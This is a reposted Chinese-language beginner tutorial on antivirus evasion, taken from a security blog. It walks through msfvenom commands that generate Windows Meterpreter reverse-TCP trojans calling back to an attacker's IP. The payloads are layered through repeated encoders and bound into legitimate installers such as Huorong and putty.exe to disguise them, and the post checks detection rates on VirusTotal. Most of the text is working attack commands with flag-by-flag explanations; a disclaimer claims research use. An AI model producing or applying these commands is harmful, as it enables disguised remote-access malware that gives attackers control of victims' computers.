免杀入门-基础篇 小白都可以看懂

admin
admin
admin
138357
文章
113
评论
2025年4月10日18:53:01评论13 views字数 4352阅读14分30秒阅读模式

怎么还比之前多了一个,多次编码好像没用了!!因为这个太老掉牙的编码已经被玩透了hh!不行,现在易容没有用了,人家检查的是灵魂~

再去试试别的。

大家不要紧张,说免杀感觉好难啥的,我会跟大家一起去学习!

基础环境:

windows用户:1.kali,2.本机或者windows虚拟机。

mac用户:1.kali(我自己是直接在本机终端下载的渗透工具),windows虚拟机(我用的是另一台windows电脑)。因为我们要用到msf,所以大家先检查一下有没有msf。

软件:最好都要有火绒和360,方便测试。

OK,那我们就开始吧!

CLASS-1 免杀是什么?

免杀”是指在计算机安全领域中,特别是在恶意软件(如病毒、木马等)或攻击中,技术手段能够绕过或规避杀毒软件的检测。这通常是通过使用各种技巧来掩盖恶意代码的真实性质,从而避免被安全软件发现和拦截。
免杀入门-基础篇 小白都可以看懂

常见的免杀技术包括:

1. **代码混淆**:通过对代码进行复杂化处理,使其不容易被静态分析工具检测。比如,改变变量名、插入无用代码等。

2. **加密和解密**:将恶意代码进行加密,在执行时解密,以避免静态检测。

3. **反沙箱和反调试**:检测恶意软件是否在受控环境中运行,若是则改变行为或停止执行。

4. **利用漏洞**:通过利用系统或应用程序的漏洞,避免被杀毒软件捕捉。

5. **动态生成代码**:在运行时动态生成恶意代码,增加静态检测的难度。

免杀难度确实会大一点,但是会一点和不会两者区别也是很大的,所以我专题的目标是让我们至少当个免杀小子hhhhh。

接下来我们直接开始实战!

CLASS-2 来吧,第一个木马!

首先这个msf会在kali里,是自带的,我这边是在自己mac本上下载好的。

首先我们先创建一个木马:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.3.175 LPORT=3333 -f exe -o payload1.exe

啥意思呢?

  • msfvenom: Metasploit Framework 的一个工具,用于生成各种恶意有效负载。

  • -p windows/meterpreter/reverse_tcp: 指定了生成的有效负载类型。windows/meterpreter/reverse_tcp 是一个反向连接的 Meterpreter shell,有助于攻击者从目标主机接收控制权限。

  • LHOST=192.168.3.175: 设置反向连接的主机地址(攻击者的机器地址)。这是目标主机将在其连接到该地址的端口上进行反向连接。

  • LPORT=3333: 设置反向连接的端口号。目标主机会尝试连接到攻击者机器上的 3333 端口。

  • -f exe: 指定了生成的文件格式,这里是 Windows 可执行文件(.exe)。

  • -o payload1.exe: 设置输出文件的名称为 payload1.exe。这是生成的有效负载的文件名。

其实本质上就是我们可以去拥有了一个木马,通过端口连接可以得到控制权!

我们先看看把木马放沙盒里,看看市面上多少款杀毒软件可以查杀到它hh。

这是网址:

https://www.virustotal.com/gui/

免杀入门-基础篇 小白都可以看懂

完蛋,彻底废了,怎么这么多可以查到?因为没做免杀啊hhhh。

我们先上线木马吧!

先让受害机器下载我的木马,记得关杀软hhhh!我因为两台机器都在同一个局域网,我用的是python下载!

免杀入门-基础篇 小白都可以看懂

然后让受害机器访问就好了!再去用msf去连接一下木马看一下效果!

免杀入门-基础篇 小白都可以看懂

OK,连上了,但是这还没有进行加固!

CLASS-3 免杀-1

上第二个木马,我把它叫做易容马!

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.211.55.2 LPORT=3333 -e x86/shikata_ga_nai -b "x00" -i 15  -f exe -o payload2.exe

  • msfvenom: 用于生成恶意有效负载的工具,属于 Metasploit 框架。

  • -p windows/meterpreter/reverse_tcp: 指定有效负载为 windows/meterpreter/reverse_tcp,表示这是一个反向 TCP shell,有助于攻击者从目标机器接收 Meterpreter 会话。

  • LHOST=10.211.55.2: 设置攻击者机器的 IP 地址,即目标机器反向连接到的地址。

  • LPORT=3333: 指定目标主机反向连接到攻击者机器的端口 3333。

  • -e x86/shikata_ga_nai: 使用 x86/shikata_ga_nai 编码器对有效负载进行编码。shikata_ga_nai 是一个多态编码器,旨在规避防御系统(如防病毒软件)的检测。

  • -b "x00": 设置排除字节,x00 是表示 NULL 字节的十六进制形式。NULL 字节通常会终止字符串,在某些情况下会导致有效负载执行失败,因此这里排除了它。

  • -i 15: 指定编码器应重复编码 15 次。这增加了有效负载的复杂性,进一步尝试规避检测系统。

  • -f exe: 指定生成的文件格式为 Windows 可执行文件(.exe)。

  • -o payload2.exe: 将生成的有效负载保存为 payload2.exe。

这里多了一个编码的步骤,通过编码可以去最简单的改变木马的样貌,不那么容易被发现!

我们试试通过编码编写完的木马是否可以躲过免杀!

免杀入门-基础篇 小白都可以看懂

怎么还比之前多了一个,多次编码好像没用了!!因为这个太老掉牙的编码已经被玩透了hh!不行,现在易容没有用了,人家检查的是灵魂~

再去试试别的。

CLASS-4 免杀-2

我把这个称之为替死鬼上身!

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.169.3.175 LPORT=3333  -x sysdiag-all-x86-6.0.2.1-2024.09.15.1.exe  -f exe -o payload3.exe

这个其实大家发现我就多加了一个选项,就是一个exe文件。大家觉得眼熟吗,我把木马捆到了厚绒的exe上了!!

再去检查一下

免杀入门-基础篇 小白都可以看懂

嘿嘿,有极大的进步了!!这个替死鬼真好用,至少比上面两个跟裸奔一样的木马好多了嘿嘿!

CLASS-5 免杀-3

接下来嘿嘿,我来一个究极炼丹炉,把易容马和替死鬼合在一起去生成木马!颤抖吧!
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.3.175 LPORT=3333 -e x86/shikata_ga_nai -b "x00" -i 15 -x sysdiag-all-x86-6.0.2.1-2024.09.15.1.exe  -f exe -o payload4.exe
究极缝合怪,去试试效果是不是会更好!
免杀入门-基础篇 小白都可以看懂

是有效果的,从4字头变成了3字头!!但是感觉效果还不是那么明显。。。

其实我感觉你编码次数再搞多一点也可以过杀软,比如我编码循环35次:

免杀入门-基础篇 小白都可以看懂

哈哈哈哈哈,就使劲叠buff吧!

class-6 免杀-4

有些同学就开始想了,那我一直编码不就好了。OK,我们可以去试试!

msfvenom  -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 20 LHOST=192.168.3.175 LPORT=3333 -f raw | msfvenom -e x86/alpha_upper -i 10 -f raw | msfvenom -e x86/countdown -i 10 -x sysdiag-all-x86-6.0.2.1-2024.09.15.1.exe -f exe -o payload5.exe

如果出现报错,你根据报错信息去加参数即可,每个人情况不一样!

这里是分成了三个部分

第一部分:msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 20 LHOST=10.211.55.2 LPORT=3333 -f raw

  • -p windows/meterpreter/reverse_tcp: 指定有效负载类型为 Windows 反向 TCP Meterpreter shell。

  • -e x86/shikata_ga_nai: 使用 x86/shikata_ga_nai 编码器对有效负载进行编码。shikata_ga_nai 是一种多态编码器,用于绕过安全检测。

  • -i 20: 重复编码 20 次。这将使有效负载经过多次编码,增加规避安全软件的复杂性。

  • LHOST=10.211.55.2 和 LPORT=3333: 指定反向连接时的攻击者 IP 地址和端口。

  • -f raw: 生成原始格式(raw)的有效负载,而不是封装成可执行文件或其他格式。

第二部分: |msfvenom -e x86/alpha_upper -i 10 -f raw

  • |: 管道符,表示将前一步生成的原始有效负载作为输入,传递到下一个 msfvenom 命令中。

  • -e x86/alpha_upper: 使用 x86/alpha_upper 编码器对上一步的有效负载进行再次编码。alpha_upper 编码器将有效负载编码成只包含大写字母的形式,以便通过特定的安全过滤器。

  • -i 10: 重复编码 10 次,以增加规避检测的难度。

  • -f raw: 再次以原始格式输出有效负载。

第三部分:| msfvenom -e x86/countdown -i 10 -x putty.exe -f exe -o payload5.exe

  • |: 将前一步生成的原始格式有效负载传递到本步骤。

  • -e x86/countdown: 使用 x86/countdown 编码器对有效负载进行编码。这是一种特殊编码器,将有效负载编码为倒数(countdown)格式。

  • -i 10: 再次编码 10 次,进一步增加复杂性。

  • -x putty.exe: 将经过多重编码的有效负载注入到一个现有的可执行文件 putty.exe 中。这意味着 putty.exe 文件将包含恶意代码,但其表面行为仍然像一个普通的 Putty 程序。

  • -f exe: 将最终结果保存为 Windows 可执行文件格式(.exe)。

  • -o payload5.exe: 将生成的有效负载输出到文件 payload5.exe 中

免杀入门-基础篇 小白都可以看懂

按照道理来说,我编码的比上次多不知道多少了,看一下效果:

免杀入门-基础篇 小白都可以看懂

意外,并没有很大的效果,说明编码次数越多可能也没有什么用处。也正常,免杀要这么简单也好了哈哈哈哈

免杀就先讲到这,看大家喜不喜欢这个专题,大家多多点赞!

▲文章转自CSDN,原作者Denst1ny,侵删
免杀入门-基础篇 小白都可以看懂
免杀入门-基础篇 小白都可以看懂
●全网最详细的burp验证码爆破
●什么是HW(护网)行动?
●2025hw即将来临?36个红队知识请务必收好!
●年薪40W!IT人的新赛道,我决定入局!
免杀入门-基础篇 小白都可以看懂

END

免杀入门-基础篇 小白都可以看懂

原文始发于微信公众号(马哥网络安全):免杀入门-基础篇 小白都可以看懂

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年4月10日18:53:01
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   免杀入门-基础篇 小白都可以看懂https://cn-sec.com/archives/3940800.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息